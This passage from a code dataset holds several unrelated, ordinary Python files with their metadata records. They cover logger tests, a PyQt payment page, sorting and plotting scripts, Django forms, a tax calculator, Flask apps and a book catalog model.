test_log_func(logs_dir: Path):\n with Logger(logs_dir) as logger:\n logger.log_func(__add, kwargs={'x': 1, 'y': 2})\n\n assert '__add' in logger.get_logs()\n\n\ndef __add(x, y):\n return x + y\n\n\ndef test_save_obj(logs_dir: Path):\n with Logger(logs_dir) as logger:\n logger.save_obj(logger, 'logger')\n\n logger_path = logs_dir.joinpath('logger.joblib')\n assert logger_path.exists()\n\n logger.save_obj(logger, 'logger', prefix_step=True)\n\n logger_path = logs_dir.joinpath('01-logger.joblib')\n assert logger_path.exists()\n\n\ndef test_save_fig(logs_dir: Path, people: pd.DataFrame):\n with Logger(logs_dir) as logger:\n plt.figure(clear=True)\n\n figure = sns.barplot(\n x='name',\n y='height',\n data=people\n ).get_figure()\n\n plt.title('Height')\n\n logger.save_fig(figure, 'height', dpi=200)\n plt.close('all')\n\n plot_path = logs_dir.joinpath('height.png')\n assert plot_path.exists()\n\n\ndef test_save_csv(logs_dir: Path, people: pd.DataFrame):\n with Logger(logs_dir) as logger:\n logger.save_csv(people, 'people')\n\n people_path = logs_dir.joinpath('people.csv')\n assert people_path.exists()\n\n\ndef test_save_json(logs_dir: Path):\n with Logger(logs_dir) as logger:\n\n dictionary = {\n 'foo': 'bar'\n }\n\n logger.save_json(dictionary, 'dictionary')\n\n path = logs_dir.joinpath('dictionary.json')\n assert path.exists()\n\n\ndef test_save_image(logs_dir: Path, astronaut: np.ndarray):\n with Logger(logs_dir) as logger:\n logger.save_image(astronaut, 'astronaut')\n\n astronaut_path = logs_dir.joinpath('astronaut.png')\n assert astronaut_path.exists()\n\n logger.save_image(astronaut, 'astronaut', prefix_step=True)\n\n astronaut_path = logs_dir.joinpath('01-astronaut.png')\n assert astronaut_path.exists()\n\n\ndef test_save_gif(logs_dir: Path, astronaut: np.ndarray):\n with Logger(logs_dir) as logger:\n images = []\n images.append(astronaut)\n\n for i in range(19):\n darker = images[i] * 0.9\n darker = darker.astype(np.uint8)\n images.append(darker)\n\n logger.save_gif(images, 'astronaut')\n\n astronaut_path = logs_dir.joinpath('astronaut.gif')\n assert astronaut_path.exists()\n\n logger.save_gif(images, 'astronaut', prefix_step=True)\n\n astronaut_path = logs_dir.joinpath('01-astronaut.gif')\n assert astronaut_path.exists()\n","sub_path":"austen/test/test_telemetry.py","file_name":"test_telemetry.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"225664967","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QWidget\nclass pay_2(QWidget):\n def __init__(self,parent=None):\n super().__init__(parent)# equivalent to the statement below\n self.setupUI()\n def setupUI(self):\n self.setGeometry(QtCore.QRect(259, 29, 981, 671))\n self.setObjectName(\"pay_widget\")\n self.page_title_label = QtWidgets.QLabel(self)\n self.page_title_label.setGeometry(QtCore.QRect(390, 110, 241, 61))\n font = QtGui.QFont()\n font.setFamily(\"思源宋体 CN\")\n font.setPointSize(24)\n font.setBold(True)\n font.setUnderline(True)\n font.setWeight(75)\n self.page_title_label.setFont(font)\n self.page_title_label.setObjectName(\"page_title_label\")\n self.pushButton = QtWidgets.QPushButton(self)\n self.pushButton.setGeometry(QtCore.QRect(440, 520, 90, 30))\n self.pushButton.setObjectName(\"pushButton\")\n\n self.erweima_label = QtWidgets.QLabel(self)\n self.erweima_label.setGeometry(QtCore.QRect(360, 200, 300, 300))\n\n self.erweima_label.setText(\"\")\n 
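# descriptive comment (added): load the QR-code image (erweima) and scale it to the label's 300x300 geometry\n        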
self.erweima_label.setPixmap(QtGui.QPixmap(\"source/erweima.jpeg\").scaled((self.erweima_label.rect().size())))\n self.erweima_label.setObjectName(\"erweima_label\")\n self.erweima_label.resize(300, 300)\n self.retranslateUi()\n\n def retranslateUi(self):\n _translate = QtCore.QCoreApplication.translate\n\n\n self.page_title_label.setText(_translate(\"Form\", \"Payment page 2\"))\n self.pushButton.setText(_translate(\"Form\", \"Pay\"))\n\n","sub_path":"源程序/14电子健康/hospital2/pay2.py","file_name":"pay2.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"9462913","text":"import random\nimport math\nimport timeit\n\ndef my_quicksort(L):\n copy = quicksort_copy(L)\n for i in range(len(L)):\n L[i] = copy[i]\n\n\ndef quicksort_copy(L):\n if len(L) < 2:\n return L\n pivot = L[0]\n left, right = [], []\n for num in L[1:]:\n if num < pivot:\n left.append(num)\n else:\n right.append(num)\n return quicksort_copy(left) + [pivot] + quicksort_copy(right)\n\n\ndef create_random_list(n):\n L = []\n for _ in range(n):\n L.append(random.randint(1,n))\n return L\n\n\ndef create_near_sorted_list(n, factor):\n L = create_random_list(n)\n L.sort()\n for _ in range(math.ceil(n*factor)):\n index1 = random.randint(0, n-1)\n index2 = random.randint(0, n-1)\n L[index1], L[index2] = L[index2], L[index1]\n return L","sub_path":"Lab3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"187361056","text":"from django import forms\nfrom profiles.models import CompanyProfile\nfrom .models import Team, AgentRole, Shift\n\n\nclass CompanyProfileForm(forms.ModelForm):\n class Meta:\n model = CompanyProfile\n exclude = ('company_id', 'plan', 'signup_date', 'renewal_date', 'payment')\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Add placeholders and classes\n \"\"\"\n super().__init__(*args, **kwargs)\n placeholders = {\n 'company_name': 'Company name',\n 'street_address1': 'Street Address 1',\n 'street_address2': 'Street Address 2',\n 'country': 'Country or State',\n 'postcode': 'Postcode',\n 'town_or_city': 'Town or City',\n 'payment': 'Paid for number of months',\n 'setting_daystart': 'Hour when your day starts',\n 'setting_dayend': 'hour when your day ends'\n }\n\n for field in self.fields:\n if field != 'country':\n if self.fields[field].required:\n placeholder = f'{placeholders[field]} *'\n else:\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = placeholder\n if field == 'setting_daystart' or field == 'setting_dayend' or field == 'payment':\n self.fields[field].widget.attrs['class'] = 'width-numbers'\n else:\n self.fields[field].widget.attrs['class'] = 'profile-form-input'\n self.fields[field].label = placeholder\n\n\nclass TeamsForm(forms.ModelForm):\n class Meta:\n model = Team\n exclude = ('company_id',)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Add placeholders and classes\n \"\"\"\n super().__init__(*args, **kwargs)\n placeholders = {\n 'team_name': 'Team name',\n 'planning_deadline': 'planning_deadline',\n 'coaching_rep': 'coaching_rep',\n 'min_lunchbreak': 'min_lunchbreak',\n 'min_dinnerbreak': 'min_dinnerbreak',\n 'min_paidbreak': 'min_paidbreak'\n }\n\n for field in self.fields:\n if self.fields[field].required:\n placeholder = f'{placeholders[field]} *'\n else:\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = 
placeholder\n self.fields[field].widget.attrs['class'] = 'profile-form-input'\n self.fields[field].label = False\n\n\nclass AgentRoleForm(forms.ModelForm):\n class Meta:\n model = AgentRole\n exclude = ('company_id',)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Add placeholders and classes\n \"\"\"\n super().__init__(*args, **kwargs)\n placeholders = {\n 'role_name': 'Role name',\n 'role_color': 'role color',\n }\n\n for field in self.fields:\n if self.fields[field].required:\n placeholder = f'{placeholders[field]} *'\n else:\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = placeholder\n self.fields[field].widget.attrs['class'] = 'profile-form-input'\n self.fields[field].label = False\n\n\nclass ShiftForm(forms.ModelForm):\n class Meta:\n model = Shift\n exclude = ('company_id',)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Add placeholders and classes\n \"\"\"\n super().__init__(*args, **kwargs)\n placeholders = {\n 'shift_name': 'Shift name',\n 'min_agents': 'Minimum Number of Agents',\n 'shift_start': 'Start time',\n 'shift_end': 'End time',\n 'weekday_sunday': 'Sunday',\n 'weekday_monday': 'Monday',\n 'weekday_tuesday': 'Tuesday',\n 'weekday_wednesday': 'Wednesday',\n 'weekday_thursday': 'Thursday',\n 'weekday_friday': 'Friday',\n 'weekday_saturday': 'Saturday'\n }\n\n for field in self.fields:\n if self.fields[field].required:\n placeholder = f'{placeholders[field]} *'\n else:\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = placeholder\n self.fields[field].widget.attrs['class'] = 'profile-form-input'\n self.fields[field].label = False\n","sub_path":"settings/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538185606","text":"#! 
/usr/bin/python\nimport sys\nimport argparse\n\nSOCIAL_BASE_LOW=3387\nSOCIAL_BASE_HIGH=25401\nPAY_BASE=3500\nL1=1500\nL2=4500\nL3=9000\nL4=35000\nL5=55000\nL6=80000\nP1=0.03\nP2=0.1\nP3=0.2\nP4=0.25\nP5=0.3\nP6=0.35\nP7=0.45\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--salary', default=10000, type=int, help='salary before tax')\n\ndef get_salary(salary):\n if salary >= SOCIAL_BASE_HIGH:\n SOCIAL_BASE=SOCIAL_BASE_HIGH\n elif salary <= SOCIAL_BASE_LOW:\n SOCIAL_BASE=SOCIAL_BASE_LOW\n else:\n SOCIAL_BASE=salary\n\n BASIC_OUT=SOCIAL_BASE*0.12+SOCIAL_BASE*0.08+SOCIAL_BASE*0.02+3+SOCIAL_BASE*0.002\n PS=salary-BASIC_OUT-PAY_BASE\n\n if PS <= 0:\n PAY=0\n elif PS <= L1:\n PAY=PS*P1\n elif PS <= L2:\n PAY=(PS-L1)*P2+L1*P1\n elif PS <= L3:\n PAY=(PS-L2)*P3+(L2-L1)*P2+L1*P1\n elif PS <= L4:\n PAY=(PS-L3)*P4+(L3-L2)*P3+(L2-L1)*P2+L1*P1\n elif PS <= L5:\n PAY=(PS-L4)*P5+(L4-L3)*P4+(L3-L2)*P3+(L2-L1)*P2+L1*P1\n elif PS <= L6:\n PAY=(PS-L5)*P6+(L5-L4)*P5+(L4-L3)*P4+(L3-L2)*P3+(L2-L1)*P2+L1*P1\n else:\n PAY=(PS-L6)*P7+(L6-L5)*P6+(L5-L4)*P5+(L4-L3)*P4+(L3-L2)*P3+(L2-L1)*P2+L1*P1\n return salary-BASIC_OUT-PAY\n\nif __name__ == '__main__':\n args = parser.parse_args(sys.argv[1:])\n print(\"salary in hand:{}\".format(get_salary(args.salary)))\n\n","sub_path":"old_salary.py","file_name":"old_salary.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"10231263","text":"#coding:utf8\r\nfrom tornado.template import Loader\r\nfrom model import *\r\nfrom utils import BaseHandler\r\nimport markdown\r\nfrom decorators import require_inited\r\n\r\n\r\nclass BaseDiaryHandler(BaseHandler):\r\n def get_condition(self):\r\n if not self.current_user or self.current_user.permission < 50:\r\n condition = {\r\n 'posted = ': True\r\n }\r\n else:\r\n condition = {}\r\n return condition\r\n\r\n def render(self, template, *args, **kw):\r\n loader = Loader('templates/' + SiteProperty.get_site_properties()['template'] + '/')\r\n categories = Category.get_items()[0]\r\n tags = Tag.get_items()[0]\r\n latest_comments = Comment.get_items(\r\n limit = 5,\r\n conditions = self.get_condition()\r\n )[0]\r\n latest_guestmessages = GuestMessage.get_items(limit = 5)[0]\r\n self.render_content.update({\r\n 'categories': categories,\r\n 'tags': tags,\r\n 'latest_comments': latest_comments,\r\n 'latest_guestmessages': latest_guestmessages,\r\n })\r\n BaseHandler.render(self, loader, template, *args, **kw)\r\n\r\nclass ListDiary(BaseDiaryHandler):\r\n @require_inited\r\n def get(self):\r\n site = SiteProperty.get_site_properties()\r\n from_cursor = self.get_argument('from', None)\r\n to_cursor = self.get_argument('to', None)\r\n diaries, prev_cursor, next_cursor = self.get_paged(\r\n Diary,\r\n '-create_time',\r\n from_cursor,\r\n to_cursor,\r\n 10,\r\n self.get_condition()\r\n )\r\n render_content = {\r\n 'diaries': diaries,\r\n 'prev_cursor': prev_cursor,\r\n 'next_cursor': next_cursor,\r\n }\r\n self.render('diary.html', **render_content)\r\n\r\nclass ListDiaryByCategory(BaseDiaryHandler):\r\n @require_inited\r\n def get(self, value):\r\n if value:\r\n category = Category.get_item('name', value)\r\n if not category:\r\n return self.redirect('/diary/')\r\n else:\r\n diaries = Diary.get_items_with_condition('ID', category.diary_list)\r\n open_diaries = [ diary for diary in diaries if diary.posted or (self.current_user and self.current_user.permission >= 50) ]\r\n render_content = {\r\n 'diaries': open_diaries,\r\n 'prev_cursor': 
None,\r\n 'next_cursor': None,\r\n }\r\n self.render('diary.html', **render_content)\r\n else:\r\n return self.redirect('/diary/')\r\n\r\nclass ListDiaryByTag(BaseDiaryHandler):\r\n @require_inited\r\n def get(self, value):\r\n if value:\r\n tag = Tag.get_item('name', value)\r\n if not tag:\r\n return self.redirect('/diary/')\r\n else:\r\n diaries = Diary.get_items_with_condition('ID', tag.diary_list)\r\n open_diaries = [ diary for diary in diaries if diary.posted or (self.current_user and self.current_user.permission >= 50) ]\r\n render_content = {\r\n 'diaries': open_diaries,\r\n 'prev_cursor': None,\r\n 'next_cursor': None,\r\n }\r\n self.render('diary.html', **render_content)\r\n\r\nclass ShowDiaryDetail(BaseDiaryHandler):\r\n @require_inited\r\n def get(self, year, month, day, url):\r\n diary = Diary.get_diary(int(year), int(month), int(day), url)\r\n user = self.current_user\r\n comments = None\r\n if diary:\r\n if (not user or user.permission < 50) and not diary.posted:\r\n return self.redirect('/diary')\r\n diary.read_diary()\r\n comments = Comment.get_items_with_condition('ID', diary.comment_list, 1000)\r\n render_content = {\r\n 'diary': diary,\r\n 'comments': comments,\r\n }\r\n self.render('diarydetail.html', **render_content)\r\n\r\n @require_inited\r\n def post(self, year, month, day, url):\r\n diary = Diary.get_diary(int(year), int(month), int(day), url)\r\n if not diary:\r\n return self.redirect('/')\r\n else:\r\n user = self.current_user\r\n if not user:\r\n return self.send_error(403)\r\n content = self.get_argument('content', '')\r\n if content.strip() == '':\r\n return self.write(u'Comment content cannot be empty')\r\n if Comment.create_comment(user, content, markdown.markdown(content, safe_mode='remove'), True, diary):\r\n self.flush_cache()\r\n self.redirect('')\r\n","sub_path":"diary.py","file_name":"diary.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"536230913","text":"from numpy import arange,genfromtxt\r\nfrom pylab import show, plot, rc, savefig, xlabel, ylabel, xlim, ylim, yscale,legend,xscale,figure,gca\r\n\r\n# import data from other code\r\nluminosity,temperature,mass,radius = genfromtxt('Stars.txt',skip_header=1,usecols=(0,1,2,3),delimiter=',',unpack=True)\r\n\r\n# Solar luminosity, mass and radius\r\nL_sun = 3.846e26\r\nM_sun = 1.989e30\r\nR_sun = 6.955e8\r\n\r\n# Use LaTeX\r\nrc('text',usetex=True)\r\n\r\n# Plot H-R Diagram\r\nfigure(1)\r\nplot(temperature,luminosity/L_sun,'k-')\r\nyscale('log')\r\nxscale('log')\r\nxlim([1500,40000])\r\nylim([9e-4,1.0e5])\r\nxlabel(r\"T$_{\\ast}$ (K)\")\r\nylabel(r\"L/L$_{\\bigodot}$\")\r\nax2 = gca()\r\nax2.invert_xaxis()\r\nsavefig('Main_sequence.png')\r\nshow(1)\r\n\r\n# Create arrays of masses to model experimental relations for main sequence\r\n# Mass-Radius relations\r\nmass2 = arange(0.1*M_sun,1.66*M_sun,0.01*M_sun)\r\nmass3 = arange(1.66*M_sun,20.0*M_sun,0.01*M_sun)\r\n\r\n# Plot Mass-Radius Relation\r\nfigure(2)\r\nplot(mass/M_sun,radius/R_sun,'ko')\r\nplot(mass2/M_sun,1.06*(mass2/M_sun)**(0.945),'r--',label=r\"R/R$_{\\bigodot}$ = 1.06(M/M$_{\\bigodot}$)$^{0.945}$\")\r\nplot(mass3/M_sun,1.33*(mass3/M_sun)**(0.555),'b--',label=r\"R/R$_{\\bigodot}$ = 1.33(M/M$_{\\bigodot}$)$^{0.555}$\")\r\nxscale('log')\r\nyscale('log')\r\nxlabel(r\"M/M$_{\\bigodot}$\")\r\nylabel(r\"R/R$_{\\bigodot}$\")\r\nlegend(loc='lower right')\r\nsavefig('Mass_radius.png')\r\nshow(2)\r\n\r\n# Create arrays of masses to model experimental relations for main sequence\r\n# 
Mass-Luminosity relations\r\nmass4 = arange(0.1*M_sun,0.7*M_sun,0.01*M_sun)\r\nmass5 = arange(0.7*M_sun,20.0*M_sun,0.01*M_sun)\r\n\r\n# Plot Mass-Luminosity Relation\r\nfigure(3)\r\nplot(mass/M_sun,luminosity/L_sun,'ko')\r\nplot(mass4/M_sun,0.35*(mass4/M_sun)**(2.62),'r--',label=r\"L/L$_{\\bigodot}$ = 0.35(M/M$_{\\bigodot}$)$^{2.62}$\")\r\nplot(mass5/M_sun,1.02*(mass5/M_sun)**(3.92),'b--',label=r\"L/L$_{\\bigodot}$ = 1.02(M/M$_{\\bigodot}$)$^{3.92}$\")\r\nxscale('log')\r\nyscale('log')\r\nxlabel(r\"M/M$_{\\bigodot}$\")\r\nylabel(r\"L/L$_{\\bigodot}$\")\r\nlegend(loc='lower right')\r\nsavefig('Mass_Luminosity.png')\r\nshow(3)","sub_path":"Stars-Final-Project-Python/Main_sequence.py","file_name":"Main_sequence.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"284760022","text":"import os\nfrom sickkidsproj import app\n\n# testing purpose\nONE_EXPRDATA = os.path.join(app.config[\"EXPRIMENT_DATA_DIR\"],\"10-1-M\")\n\n# panels\nGENE_PANELS = []\nGENE_PANEL_PATHS = []\nwith open(app.config[\"GENE_PANEL_LIST\"], \"r\") as f:\n for panel in f.read().strip().split('\\n'):\n GENE_PANELS.append(panel)\n GENE_PANEL_PATHS.append(os.path.join(app.config[\"GENE_PANEL_DIR\"], panel))\n\nTISSUE_SITES = []\nwith open(app.config[\"TISSUE_SITE_LIST\"], \"r\") as f:\n for tissueSite in f.read().strip().split('\\n'):\n TISSUE_SITES.append(tissueSite)\n\n# testing purposes\nONE_EXONEXPR = os.path.join(app.config[\"EXON_EXPR_DIR\"], \"47/ENSG00000182533\")\n\ndef get_panel_gene(panel):\n \"\"\" Gets list of gene associated with a gene panel\n @param str gene_panel\n @rType dict: \n [ ..., {\n \"ensembl_id\": \"ENSG00000138435\",\n \"symbol\": \"CHRNA1\"\n },\n ] \n \"\"\"\n genes = []\n with open(os.path.join(app.config[\"GENE_PANEL_DIR\"], panel), 'r') as f:\n for line in f:\n pair = line.split('\\t')\n genes.append({\n \"symbol\": pair[0].strip(),\n \"ensembl_id\": pair[1].strip()\n })\n return genes\n\nPANEL_REF = {}\nfor panel in GENE_PANELS:\n PANEL_REF[panel] = get_panel_gene(panel)\n\n\n\"\"\" A reference dictionary that maps ensembl_id to gene_symbol\n @rType: {\n ensembl_id: gene_symbol\n } \n\"\"\"\nGENE_SYMBOL_REF = {}\nwith open(app.config[\"GENE_SYMBOL_MAPPING\"], 'r') as f:\n for l in f.read().strip().split('\\n'):\n ll = l.strip().split('\\t')\n\n ensembl_id = ll[0]\n symbol = \"\"\n if len(ll) == 2:\n symbol = ll[1]\n\n GENE_SYMBOL_REF[ensembl_id] = symbol\n\n\n\n\"\"\" EXPRDATA_FILEPATHS [...exprdata_fp]\n A list of file path for experimental data in terms of exon reads\n\"\"\"\ndef get_all_exprdata_filepaths():\n fps = []\n for f in os.listdir(app.config[\"EXPRIMENT_DATA_DIR\"]):\n if not f.startswith('.') and not f.endswith('coverage') and not f.endswith('.sh'):\n fps.append(os.path.join(app.config[\"EXPRIMENT_DATA_DIR\"], f))\n return fps\nEXPRDATA_FILEPATHS = get_all_exprdata_filepaths()\n\n\n\"\"\"Available options for ranking\"\"\"\nOPTION_RANKING_ALL_GENE = \"all_gene\"\nOPTION_RANKING_ALL_GENEPANEL = \"all_gene_panel\"\nOPTION_RANKING_GENE = \"gene\"\nRANKING_OPTIONS = [OPTION_RANKING_GENE, OPTION_RANKING_ALL_GENE, OPTION_RANKING_ALL_GENEPANEL]\n\n \n\"\"\" Available options for inspection \"\"\"\nOPTION_EXONEXPR = \"exon_expr\"\nOPTION_GENEEXPR = \"gene_expr\"\nOPTION_GENEPANELS = \"gene_panels\"\nRESOURCES_OPTIONS = [OPTION_EXONEXPR, OPTION_GENEEXPR, OPTION_GENEPANELS]\n\n\n\"\"\" Possible extensions for files under resources/\"\"\"\nEXT_TEN = \"10\"\nEXT_TWENTY = \"20\"\nEXT_INC = 
\"modified\"\nEXTS = [EXT_TEN, EXT_TWENTY, EXT_INC]\n\n# dev specific globals\nif app.config[\"DEBUG\"]:\n\n GENCODEID_STRAND_REF = {} # gencodeid -> strand +/-\n ENSEMBLID_EXONCOUNT_REF = {} # ensembl_id -> exon_count\n\n with open(app.config[\"GENCODE_EXON_POS_ID_MAPPING\"], 'r') as f:\n f.readline()\n\n for line in f:\n row = line.strip().split('\\t')\n assert(len(row) == 5)\n\n gencodeid = row[0]\n ensembl_id = gencodeid.split('.')[0]\n strand = row[-1]\n\n # assumes entries in f unique, \n if ensembl_id not in ENSEMBLID_EXONCOUNT_REF: \n ENSEMBLID_EXONCOUNT_REF[ensembl_id] = 1\n else:\n ENSEMBLID_EXONCOUNT_REF[ensembl_id] += 1\n\n GENCODEID_STRAND_REF[gencodeid] = strand\n\n\n\n\n\n\n","sub_path":"sickkidsproj/cache/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"4293196","text":"# import libraries\nfrom flask import Flask, render_template, redirect\nfrom flask_pymongo import PyMongo\nimport scrape_mars\nimport pymongo\n\nconn = \"mongodb://localhost:27017\"\nclient = pymongo.MongoClient(conn)\n\ndb = client.mars_db\n# create instance of Flask app\napp = Flask(__name__)\n# mongo = PyMongo(app, uri=\"mongodb://localhost:27017/mars_info\")\n\n# create route that renders index.html template\n@app.route(\"/\")\ndef home():\n mars_data = db.mars_info.find_one()\n print(mars_data)\n return render_template(\"index.html\", mars_all= mars_data)\n\n@app.route(\"/scrape\")\ndef scrape():\n # Run the scrape function\n mars_dict = scrape_mars.scrape_info()\n # Update the Mongo database using update and upsert=True\n # mongo.db.mars_site.update({}, mars_dict, upsert=True)\n # Redirect back to home page\n return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"Missions_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460594722","text":"from pyludo import LudoGame, StandardLudoPlayers\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom os import path\nfrom LudoPlayerGenetic import LudoPlayerGenetic\nfrom Population import Population\n\n\ndef load_pop_size(gen=1, file='', script_dir=''):\n return len(np.load(script_dir + file + str(gen) + '.npy'))\n\n\ndef load_pop(population, gen=1, file='', script_dir=''):\n population.file = file\n population.script_dir = script_dir\n population.load_pop(gen)\n\n\ndef load_only_fitness(gen=1, file='fitness_', folder=''):\n script_dir = path.dirname(__file__) + '/' + folder + '/'\n return np.load(script_dir + file + str(gen) + '.npy')\n\n\ndef assign_fitness(amount_of_games, population):\n # print('Assigning fitness to the population')\n agent_idx = population.get_fitless_agent_idx()\n while agent_idx != -1:\n GA_agent = population.pop[agent_idx]\n # print('Calculating fitness for agent: ', agent_idx)\n # print(GA_agent)\n players = [LudoPlayerGenetic(GA_agent)] + [StandardLudoPlayers.LudoPlayerRandom() for _ in range(3)]\n for id, player in enumerate(players):\n player.id = id\n\n n = amount_of_games\n fitness = np.zeros(4, dtype=np.int)\n # print(agent_idx)\n for i in range(n):\n\n np.random.shuffle(players)\n ludoGame = LudoGame(players)\n winner = ludoGame.play_full_game()\n fitness[players[winner].id] += 1\n population.fitness_add(fitness_score=fitness[0] / amount_of_games, index_of_chromosomes=agent_idx)\n agent_idx = population.get_fitless_agent_idx()\n\n\ndef 
plot_pop200(to_gen=100, file='pop200_', folder='pop_pool', title='Random, sigma/4 '):\n\n script_dir = path.dirname(__file__) + '/' + folder + '/'\n fitness = []\n fitaxis = []\n fitmax = []\n pop_size = load_pop_size(gen=1, file=file, script_dir=script_dir)\n population = Population(pop_size)\n gens = range(1, to_gen + 1)\n for i in gens:\n load_pop(population, gen=i, file=file, script_dir=script_dir)\n assign_fitness(100, population=population)\n fitness = np.append(fitness, population.fitness)\n fitaxis = np.append(fitaxis, (np.zeros(pop_size, dtype=np.int) + i))\n fitmax = np.append(fitmax, population.fitness[np.argmax(population.fitness)])\n plt.figure()\n plt.plot(fitaxis, fitness, 'o', gens, np.sum(np.split(fitness / pop_size, len(gens)), axis=1))\n plt.ylabel('win rate')\n plt.xlabel('Generation')\n plt.legend(['Win-rate', 'Mean win-rate'], loc='center right')\n plt.suptitle(title)\n\n\nplot_gen = 500\n\n#plot_pop200(to_gen=plot_gen, file='pop200_', folder='pop_poolt', title='t ')\n\n#plot_pop200(to_gen=plot_gen, file='pop_pool_self_', folder='pop_pool_self', title='Self ')\n#plot_pop200(to_gen=plot_gen, file='pop200_more_lossy_muta_sigma_', folder='pop_pool_more_lossy_10_muta_40_sigma_4', title='Random, pop_pool_more_lossy_10_muta_40_sigma_4 ')\n#plot_pop200(to_gen=plot_gen, file='pop200_lossy_muta_sigma_', folder='pop_pool_lossy_7_muta_15_sigma_2', title='Random, pop_pool_lossy_7_muta_15_sigma_2 ')\n#plot_pop200(to_gen=plot_gen, file='pop200_sigma2_', folder='pop_pool_sigma_2', title='Random, half sigma ')\n#plot_pop200(to_gen=plot_gen, file='pop200_lossy_', folder='pop_pool_more_loss', title='Random, High selection ')\n\nplt.figure()\nplt.plot(load_only_fitness(gen=500, file='fitness_', folder='pop_pool'), 'o', load_only_fitness(gen=500, file='fitness_t_', folder='pop_pool_self'), 'ro')\nplt.ylabel('win rate')\nplt.xlabel('Population')\nplt.legend(['random', 'self'], loc='lower right')\nplt.suptitle('Random vs. 
self')\nplt.xlim([0, 100])\n\n#plot_pop200(to_gen=plot_gen, file='pop200_', folder='pop_pool', title='Random ')\n\n#plot_pop200(to_gen=plot_gen, file='pop40_', folder='pop_pool_small', title='small')\n#plot_pop200(to_gen=plot_gen, file='pop40_all_', folder='pop_pool_small_all', title='small')\n\nplt.show()\n'''\nf = [[1, 2], [3, 4]]\nf = np.append(f, [5, 6])\n\nprint(f)\nprint(np.sum(np.split(f, 3), axis=1))\n'''\n","sub_path":"ludoAI/genetic/plot_g.py","file_name":"plot_g.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"77784795","text":"from database import db, marshmallow, database_init\n\n\n# Define the Book class that overrides SQLAlchemy's Model class\nclass Book(db.Model):\n # Define the Book fields which will be mapped to database columns\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200), nullable=False,)\n topic = db.Column(db.String(200), nullable=False,)\n quantity = db.Column(db.Integer, nullable=False, default=0,)\n price = db.Column(db.Float, nullable=False)\n\n # Constructor\n def __init__(self, title, topic, quantity, price):\n self.title = title\n self.quantity = quantity\n self.topic = topic\n self.price = price\n\n # Static method to search for books based on the topic\n @classmethod\n def search(cls, topic):\n # Returns books that contain the query string, ignoring case\n return Book.query.filter(Book.topic.ilike(f'%{topic}%'))\n\n # Static method to get a book using its ID\n @classmethod\n def get(cls, id):\n return Book.query.get(id)\n\n # Static method to update the fields of a book given its ID\n # If the field is not passed (or passed as None), it will not be affected\n @classmethod\n def update(cls, id, title=None, quantity=None, topic=None, price=None):\n book = Book.query.get(id)\n if book is None:\n return None\n book.title = title if title is not None else book.title\n book.quantity = quantity if quantity is not None and quantity >= 0 else book.quantity\n book.topic = topic if topic is not None else book.topic\n book.price = price if price is not None and price >= 0.0 else book.price\n\n db.session.commit()\n return book\n\n\n# Add the 4 books as an initial entry to the database\ndatabase_init += [\n Book('How to get a good grade in DOS in 20 minutes a day', 'Distributed Systems', 10, 25.00),\n Book('RPCs for Dummies', 'Distributed Systems', 5, 50.00),\n Book('Xen and the Art of Surviving Graduate School', 'Graduate School', 10, 15.00),\n Book('Cooking for the Impatient Graduate Student', 'Graduate School', 25, 10.00)\n]\n\n\n# Define Marshmallow Formatter Schema class for query-by-topic response fields\nclass TopicSchema(marshmallow.Schema):\n class Meta:\n fields = ('id', 'title', 'topic')\n\n\n# Define Marshmallow Formatter Schema class for query-by-item response fields\nclass ItemSchema(marshmallow.Schema):\n class Meta:\n fields = ('title', 'quantity', 'price')\n\n\n# Define Marshmallow Formatter Schema class for update response fields\nclass UpdateSchema(marshmallow.Schema):\n class Meta:\n fields = ('title', 'quantity', 'topic', 'price')\n\n\n# Instantiate an object from each schema class\nitem_schema = ItemSchema()\ntopic_schema = TopicSchema(many=True)\nupdate_schema = UpdateSchema()\n\n\n","sub_path":"bzr-catalog/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"479968572","text":"# -*- coding: 
